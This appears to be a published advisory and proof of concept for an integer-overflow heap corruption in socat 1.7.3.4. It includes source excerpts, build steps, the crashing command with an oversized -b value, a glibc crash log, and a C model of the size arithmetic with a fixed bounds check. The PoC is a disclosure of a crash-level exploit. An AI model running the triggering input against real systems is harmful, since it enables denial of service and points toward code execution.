# Exploit Title: Socat 1.7.3.4 - Heap Based Overflow (PoC)
# Date: 2020-02-03
# Exploit Author: hieubl from HPT Cyber Security
# Vendor Homepage: http://www.dest-unreach.org/
# Software Link: http://www.dest-unreach.org/socat/
# Version: 1.7.3.4
# Tested on: Ubuntu 16.04.6 LTS
# CVE :

# Heap-Based Overflow due to Integer Overflow and Lack of PIE mitigation (PoC)

------- [***Description***] -------

The _socat() function in socat.c sizes its transfer buffer with an unchecked multiplication. socat_opts.bufsiz is a size_t taken from the -b option, so for large values 2*socat_opts.bufsiz+1 wraps around and a much smaller buffer than intended is allocated:

int _socat(void) {
    ...
    unsigned char *buff;
    ...
    buff = Malloc(2*socat_opts.bufsiz+1)
    ...
}

Later, the line

if ((bytes2 = xiotransfer(sock2, sock1, &buff, socat_opts.bufsiz, true)) < 0) {

passes the original, un-wrapped bufsiz to xiotransfer(). xiotransfer() calls xioread(), and xioread() finally calls Read() with that same length, so the read is bounded by bufsiz while the buffer was sized by the wrapped value:

ssize_t xioread(xiofile_t *file, void *buff, size_t bufsiz) {
    ...
    Read(pipe->fd, buff, bufsiz);  //[***!!!This line of code leads to Heap-Based Overflow vulnerability***!!!]
    ...
}

In addition, the "Makefile" does not build socat as a Position Independent Executable (PIE): CFLAGS does not contain the "-pie" flag, and the default toolchain on Ubuntu 16.04 does not enable PIE on its own. The binary is therefore loaded at a fixed address (0x400000), which makes the heap corruption easier to exploit and may even lead to Remote Code Execution (RCE).
Reference: https://hackerone.com/reports/415272, a $100 bounty for "Linux Desktop application slack executable does not use pie / no ASLR".

------- [***Download and build***] -------

Download link: http://www.dest-unreach.org/socat/download/socat-1.7.3.4.tar.gz

$ tar xzvf socat-1.7.3.4.tar.gz
$ cd socat-1.7.3.4/
$ ./configure

Modify the "Makefile" so that the CFLAGS line reads:

CFLAGS = -g -O -D_GNU_SOURCE -Wall -Wno-parentheses $(CCOPTS) $(DEFS) $(CPPFLAGS)

(the "-g" flag is added for debugging purposes)

$ make
$ sudo make install

------- [***Proof of Concept***] -------

$ checksec socat
[*] '/home/natsu/temp/socat-1.7.3.4/socat'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)
    FORTIFY:  Enabled

>>> There is no PIE mitigation!

$ python -c 'print "A"*1000000' > a
$ touch b
$ socat -b9223372036854775888 OPEN:a,readbytes=1000000 OPEN:b,readbytes=1000000

This proof of concept triggers the bug by setting the buffer size to 0x8000000000000050 (9223372036854775888 in decimal). The expression 2*socat_opts.bufsiz+1 is evaluated in size_t: 2*0x8000000000000050 is 0x100000000000000a0, which wraps to 0xa0, so "Malloc(2*socat_opts.bufsiz+1)" becomes Malloc(0xa1). Only 0xa1 bytes are allocated, while socat_opts.bufsiz still holds the full 0x8000000000000050 and is passed on as the read length. Since the wrap needs a bufsiz of at least 0x8000000000000000, the bug is reachable only where the -b argument is attacker-influenced.
The readbytes option ("readbytes=1000000") bounds the read length: a single read of 0x8000000000000050 bytes cannot be served, so readbytes is used to cap it at 1000000 bytes, which still far exceeds the 0xa1-byte allocation. The cap is applied in xioread() by these lines:

if (pipe->readbytes) {
    if (pipe->actbytes == 0) {
        return 0;
    }
    if (pipe->actbytes < bufsiz) {
        bufsiz = pipe->actbytes;
    }
}

------- [***Crash logs***] -------

*** Error in `socat': free(): invalid next size (normal): 0x000000000106a110 ***
======= Backtrace: =========
/lib/x86_64-linux-gnu/libc.so.6(+0x777e5)[0x7fc0ee5817e5]
/lib/x86_64-linux-gnu/libc.so.6(+0x8037a)[0x7fc0ee58a37a]
/lib/x86_64-linux-gnu/libc.so.6(cfree+0x4c)[0x7fc0ee58e53c]
socat[0x407e3f]
socat[0x4084c6]
socat[0x408f7a]
/lib/x86_64-linux-gnu/libc.so.6(__libc_start_main+0xf0)[0x7fc0ee52a830]
socat[0x4057a9]
======= Memory map: ========
00400000-0044a000 r-xp 00000000 08:01 655643 /usr/local/bin/socat
00649000-0064a000 r--p 00049000 08:01 655643 /usr/local/bin/socat
0064a000-0064b000 rw-p 0004a000 08:01 655643 /usr/local/bin/socat
0064b000-0068c000 rw-p 00000000 00:00 0
01069000-0108a000 rw-p 00000000 00:00 0 [heap]
7fc0e8000000-7fc0e8021000 rw-p 00000000 00:00 0
7fc0e8021000-7fc0ec000000 ---p 00000000 00:00 0
7fc0eded3000-7fc0edee9000 r-xp 00000000 08:01 397801 /lib/x86_64-linux-gnu/libgcc_s.so.1
7fc0edee9000-7fc0ee0e8000 ---p 00016000 08:01 397801 /lib/x86_64-linux-gnu/libgcc_s.so.1
7fc0ee0e8000-7fc0ee0e9000 rw-p 00015000 08:01 397801 /lib/x86_64-linux-gnu/libgcc_s.so.1
7fc0ee0e9000-7fc0ee0ec000 r-xp 00000000 08:01 397787 /lib/x86_64-linux-gnu/libdl-2.23.so
7fc0ee0ec000-7fc0ee2eb000 ---p 00003000 08:01 397787 /lib/x86_64-linux-gnu/libdl-2.23.so
7fc0ee2eb000-7fc0ee2ec000 r--p 00002000 08:01 397787 /lib/x86_64-linux-gnu/libdl-2.23.so
7fc0ee2ec000-7fc0ee2ed000 rw-p 00003000 08:01 397787 /lib/x86_64-linux-gnu/libdl-2.23.so
7fc0ee2ed000-7fc0ee305000 r-xp 00000000 08:01 397909 /lib/x86_64-linux-gnu/libpthread-2.23.so
7fc0ee305000-7fc0ee504000 ---p 00018000 08:01 397909 /lib/x86_64-linux-gnu/libpthread-2.23.so
7fc0ee504000-7fc0ee505000 r--p 00017000 08:01 397909 /lib/x86_64-linux-gnu/libpthread-2.23.so
7fc0ee505000-7fc0ee506000 rw-p 00018000 08:01 397909 /lib/x86_64-linux-gnu/libpthread-2.23.so
7fc0ee506000-7fc0ee50a000 rw-p 00000000 00:00 0
7fc0ee50a000-7fc0ee6ca000 r-xp 00000000 08:01 397763 /lib/x86_64-linux-gnu/libc-2.23.so
7fc0ee6ca000-7fc0ee8ca000 ---p 001c0000 08:01 397763 /lib/x86_64-linux-gnu/libc-2.23.so
7fc0ee8ca000-7fc0ee8ce000 r--p 001c0000 08:01 397763 /lib/x86_64-linux-gnu/libc-2.23.so
7fc0ee8ce000-7fc0ee8d0000 rw-p 001c4000 08:01 397763 /lib/x86_64-linux-gnu/libc-2.23.so
7fc0ee8d0000-7fc0ee8d4000 rw-p 00000000 00:00 0
7fc0ee8d4000-7fc0eeaef000 r-xp 00000000 08:01 397619 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0
7fc0eeaef000-7fc0eecee000 ---p 0021b000 08:01 397619 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0
7fc0eecee000-7fc0eed0a000 r--p 0021a000 08:01 397619 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0
7fc0eed0a000-7fc0eed16000 rw-p 00236000 08:01 397619 /lib/x86_64-linux-gnu/libcrypto.so.1.0.0
7fc0eed16000-7fc0eed19000 rw-p 00000000 00:00 0
7fc0eed19000-7fc0eed77000 r-xp 00000000 08:01 397620 /lib/x86_64-linux-gnu/libssl.so.1.0.0
7fc0eed77000-7fc0eef77000 ---p 0005e000 08:01 397620 /lib/x86_64-linux-gnu/libssl.so.1.0.0
7fc0eef77000-7fc0eef7b000 r--p 0005e000 08:01 397620 /lib/x86_64-linux-gnu/libssl.so.1.0.0
7fc0eef7b000-7fc0eef82000 rw-p 00062000 08:01 397620 /lib/x86_64-linux-gnu/libssl.so.1.0.0
7fc0eef82000-7fc0eef84000 r-xp 00000000 08:01 397944 /lib/x86_64-linux-gnu/libutil-2.23.so
7fc0eef84000-7fc0ef183000 ---p 00002000 08:01 397944 /lib/x86_64-linux-gnu/libutil-2.23.so
7fc0ef183000-7fc0ef184000 r--p 00001000 08:01 397944 /lib/x86_64-linux-gnu/libutil-2.23.so
7fc0ef184000-7fc0ef185000 rw-p 00002000 08:01 397944 /lib/x86_64-linux-gnu/libutil-2.23.so
7fc0ef185000-7fc0ef18c000 r-xp 00000000 08:01 397917 /lib/x86_64-linux-gnu/librt-2.23.so
7fc0ef18c000-7fc0ef38b000 ---p 00007000 08:01 397917 /lib/x86_64-linux-gnu/librt-2.23.so
7fc0ef38b000-7fc0ef38c000 r--p 00006000 08:01 397917 /lib/x86_64-linux-gnu/librt-2.23.so
7fc0ef38c000-7fc0ef38d000 rw-p 00007000 08:01 397917 /lib/x86_64-linux-gnu/librt-2.23.so
7fc0ef38d000-7fc0ef3b3000 r-xp 00000000 08:01 397735 /lib/x86_64-linux-gnu/ld-2.23.so
7fc0ef594000-7fc0ef59a000 rw-p 00000000 00:00 0
7fc0ef5b1000-7fc0ef5b2000 rw-p 00000000 00:00 0
7fc0ef5b2000-7fc0ef5b3000 r--p 00025000 08:01 397735 /lib/x86_64-linux-gnu/ld-2.23.so
7fc0ef5b3000-7fc0ef5b4000 rw-p 00026000 08:01 397735 /lib/x86_64-linux-gnu/ld-2.23.so
7fc0ef5b4000-7fc0ef5b5000 rw-p 00000000 00:00 0
7ffe11dd9000-7ffe11dfa000 rw-p 00000000 00:00 0 [stack]
7ffe11dfb000-7ffe11dfe000 r--p 00000000 00:00 0 [vvar]
7ffe11dfe000-7ffe11e00000 r-xp 00000000 00:00 0 [vdso]
ffffffffff600000-ffffffffff601000 r-xp 00000000 00:00 0 [vsyscall]
2020/02/04 05:33:00 socat[47233] E exiting on signal 6

The "free(): invalid next size" abort is glibc's malloc consistency check firing when the 0xa1-byte chunk is freed: the 1000000-byte read overwrote the size field of the following heap chunk. The socat text segment mapped at 00400000 is the fixed, non-PIE load address reported by checksec above.
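The following C program is an added example (not part of the advisory and not socat's code) that reproduces the arithmetic of the Description and PoC sections without touching a real heap: unchecked_alloc_size() is the same 2*bufsiz+1 expression socat evaluates in size_t, clamped_read_len() is the readbytes= clamp quoted from xioread(), and heap_overrun_bytes() combines them to show how far a single Read() writes past the allocation. checked_alloc_size() is the hardened form a fix would use, rejecting any bufsiz for which 2*bufsiz+1 cannot fit in a size_t. The function names are mine; the -b and readbytes= values are the ones used in the PoC.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/*
 * Added example, not socat's code: the size arithmetic behind the PoC.
 * bufsiz models socat_opts.bufsiz (a size_t parsed from -b).
 */

/* Exactly the expression socat uses for Malloc(2*socat_opts.bufsiz+1).
 * Unsigned arithmetic wraps modulo 2^64 instead of failing. */
size_t unchecked_alloc_size(size_t bufsiz)
{
    return 2 * bufsiz + 1;
}

/*
 * Hardened variant: 2*bufsiz+1 <= SIZE_MAX  <=>  bufsiz <= (SIZE_MAX-1)/2.
 * Returns 0 on rejection; 0 is never a legitimate result (the minimum is 1),
 * so a caller can treat 0 as "refuse this -b value".
 */
size_t checked_alloc_size(size_t bufsiz)
{
    if (bufsiz > (SIZE_MAX - 1) / 2)
        return 0;
    return 2 * bufsiz + 1;
}

/*
 * Mirrors the readbytes= clamp quoted from xioread(): the read length is
 * bufsiz, capped to the remaining actbytes; zero actbytes reads nothing.
 */
size_t clamped_read_len(size_t bufsiz, size_t actbytes)
{
    if (actbytes == 0)
        return 0;
    if (actbytes < bufsiz)
        bufsiz = actbytes;
    return bufsiz;
}

/*
 * Bytes a single Read() into the (wrapped-size) buffer writes past its end,
 * 0 when the read fits. This is the vulnerable combination, on purpose.
 */
size_t heap_overrun_bytes(size_t bufsiz, size_t actbytes)
{
    size_t alloc = unchecked_alloc_size(bufsiz);
    size_t len = clamped_read_len(bufsiz, actbytes);
    return len > alloc ? len - alloc : 0;
}

int main(void)
{
    size_t bufsiz = 0x8000000000000050ULL;   /* the PoC's -b value (9223372036854775888) */
    size_t readbytes = 1000000;              /* the PoC's readbytes= value */

    printf("2*bufsiz+1 wraps to 0x%zx\n", unchecked_alloc_size(bufsiz));
    printf("checked size: %zu (0 = rejected)\n", checked_alloc_size(bufsiz));
    printf("read length after readbytes clamp: %zu\n",
           clamped_read_len(bufsiz, readbytes));
    printf("bytes written past the chunk: %zu\n",
           heap_overrun_bytes(bufsiz, readbytes));
    printf("a sane -b 8192 gives checked size %zu\n", checked_alloc_size(8192));
    return 0;
}
```

For the PoC's values the wrapped allocation is 0xa1 bytes and the clamped read is 1000000 bytes, so 999839 bytes land beyond the chunk, which is what corrupts the next chunk's size field and produces the free() abort in the crash log. The same bound check, applied where -b is parsed, would turn the wrap into a clean error.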